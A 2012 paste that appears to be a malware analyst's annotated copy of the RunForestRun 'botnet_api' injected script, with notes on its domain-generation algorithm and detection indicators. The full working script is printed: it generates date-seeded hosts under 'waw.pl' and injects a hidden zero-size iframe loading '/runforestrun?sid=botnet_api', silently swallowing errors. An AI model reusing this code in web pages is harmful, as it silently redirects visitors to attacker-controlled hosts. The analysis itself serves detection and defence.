
Untitled

a guest
Jul 26th, 2012
  1. /* New domain name generating algorithm used by the "botnet_api"
  2.    version of the RunForestRun attack described here:
  3.    http://blog.UnmaskParasites.com/2012/07/26/runforestrun-now-encrypts-legitimate-js-files
  4.    ============================================================== */
  5.  
  6. //Congratulations! you have successfully extracted the gootkit payload
  7. //this means i must work hardly :(
  8.  
  9.  
  // [analyst note] Step function of the generator that drives the domain name
  // generating algorithm (DGA). It is installed as the `next` method by
  // RandomNumberGenerator and works entirely on the state held on `this`.
  //
  // Reads:   this.seed, this.Q, this.R, this.A, this.M, this.oneOverM
  // Writes:  this.seed (the new state)
  // Returns: the new seed multiplied by oneOverM (i.e. seed / M).
  //
  // The hi/lo split resembles Schrage's decomposition of a multiplicative
  // congruential generator, but Q is set to the untruncated quotient M / A and
  // `hi` is not floored either, so everything here is floating-point
  // arithmetic. Anyone re-implementing this to precompute domains for a
  // blocklist or sinkhole has to keep the same floating-point operations in
  // the same order; an integer "textbook" port is not guaranteed to produce
  // the same labels.
  10. function nextRandomNumber() {
  11.     var hi = this.seed / this.Q;
  12.     var lo = this.seed % this.Q;
  13.     var test = this.A * lo - this.R * hi;
          // Fold a non-positive intermediate back into range by adding M.
  14.     if (test > 0) {
  15.         this.seed = test;
  16.     } else {
  17.         this.seed = test + this.M;
  18.     }
  19.     return (this.seed * this.oneOverM);
  20. }
  21.  
  // [analyst note] Constructor for the DGA's generator state.
  //
  // @param unix  timestamp in seconds (it is multiplied by 1000 for Date).
  // @returns     `this`, carrying seed, A, M, Q, R, oneOverM and next().
  //
  // What the seed depends on, and why that matters for detection:
  //   - getMonth(), getDate() and getHours() are evaluated in the browser's
  //     LOCAL time zone, so visitors in different time zones can derive
  //     different labels at the same instant.
  //   - Only month (0-11), day of month and a coarse hour slot are used; the
  //     year and the minutes/seconds are not. The seed therefore takes at most
  //     12 x 31 x 5 distinct values and repeats every year, which makes the
  //     full candidate set small enough to enumerate ahead of time.
  //   - The hour slot is Math.ceil(hours / 6): 0 for hour 0, 1 for hours 1-6,
  //     2 for 7-12, 3 for 13-18 and 4 for 19-23, i.e. five values, not four.
  22. function RandomNumberGenerator(unix) {
  23.     var d = new Date(unix * 1000);
  24.     var s = Math.ceil(d.getHours() / 6);
          // Math.round() has no effect here because s is already an integer.
          // The base constant 2345678901 is larger than the modulus M below.
  25.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
          // A = 48271 and M = 2147483647 (2^31 - 1) are the multiplier and
          // modulus of the Park-Miller "minimal standard" generator.
  26.     this.A = 48271;
  27.     this.M = 2147483647;
          // Q is a non-integer floating-point quotient (no Math.floor).
  28.     this.Q = this.M / this.A;
  29.     this.R = this.M % this.A;
  30.     this.oneOverM = 1.0 / this.M;
  31.     this.next = nextRandomNumber;
  32.     return this;
  33. }
  34.  
  // [analyst note] Draws one value from generator `r` (calls r.next() once,
  // which advances its state) and scales it onto the span Min..Max, rounding
  // to the nearest integer with Math.round.
  //
  // @param r    object exposing next(), as built by RandomNumberGenerator
  // @param Min  lower end of the target span
  // @param Max  upper end of the target span
  // @returns    Math.round((Max - Min) * r.next() + Min)
  35. function createRandomNumber(r, Min, Max) {
  36.     return Math.round((Max - Min) * r.next() + Min);
  37. }
  38.  
  // [analyst note] Builds the host name "<prefix>.<label>.<zone>".
  //
  // @param unix    timestamp in seconds, passed to RandomNumberGenerator
  // @param length  number of characters in the seeded label
  // @param zone    parent zone appended after the label
  // @returns       the assembled host name string
  //
  // The two parts behave very differently, which decides what can be matched:
  //   - <prefix> comes from Math.random(), so it is different on every run and
  //     cannot be predicted. Its length is 0-31 characters; when it is 0 the
  //     result starts with a bare "." (an empty leading label).
  //   - <label> comes from the date-seeded generator and is the same for every
  //     run that shares the same local month, day and hour slot.
  // Blocklists, sinkholes and DNS/proxy detections should therefore key on the
  // "<label>.<zone>" suffix (a wildcard over the prefix), not on full host names.
  39. function generatePseudoRandomString(unix, length, zone) {
  40.     var rand = new RandomNumberGenerator(unix);
  41.     var subdomainlen = Math.floor(Math.random() * 32);
          // Fixed 64-character alphabet, lower-case letters only, with repeats.
  42.     var letters = "huozfexmrufmqhgnsvkehzrfrqoplpvbuaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
  43.     var str = '';
          // Unpredictable prefix: indices 0..letters.length-2 via Math.random().
  44.     for (var i = 0; i < subdomainlen; i++) {
  45.         str += letters[Math.floor(Math.random() * (letters.length - 1))];
  46.     }
  47.     str += '.'
          // Seeded label: `length` characters chosen by the seeded generator.
  48.     for (var i = 0; i < length; i++) {
  49.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  50.     }
  51.     return str + '.' + zone;
  52. }
  53.  
  // [analyst note] Payload trigger. 500 ms after the script is evaluated it
  // appends one hidden IFRAME to document.body that loads
  // http://<generated host>/runforestrun?sid=botnet_api, where the host is
  // produced by generatePseudoRandomString(now, 16, 'waw.pl').
  //
  // Indicators visible in this block that a defender can match on:
  //   - request path and query "/runforestrun?sid=botnet_api" over plain HTTP;
  //   - host names ending in a 16-character lower-case label under "waw.pl";
  //   - an IFRAME with 0px width, 0px height and visibility "hidden";
  //   - the implicit globals `iframeWasCreated` and `ifrm` on the page's window.
  54. setTimeout(function() {
          // The empty catch at the end discards every error, so a failure
          // leaves no trace in the browser console.
  55.     try {
              // Global flag: the body runs only while this name is undefined,
              // so repeated copies of the snippet in one page inject once.
  56.         if (typeof iframeWasCreated == "undefined") {
  57.             iframeWasCreated = true;
  58.             var unix = Math.round(+new Date() / 1000);
  59.             var domainName = generatePseudoRandomString(unix, 16, 'waw.pl');
  60.             ifrm = document.createElement("IFRAME");
  61.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet_api");
  62.             ifrm.style.width = "0px";
  63.             ifrm.style.height = "0px";
  64.             ifrm.style.visibility = "hidden";
  65.             document.body.appendChild(ifrm);
  66.         }
  67.     } catch (e) {}
  68. }, 500);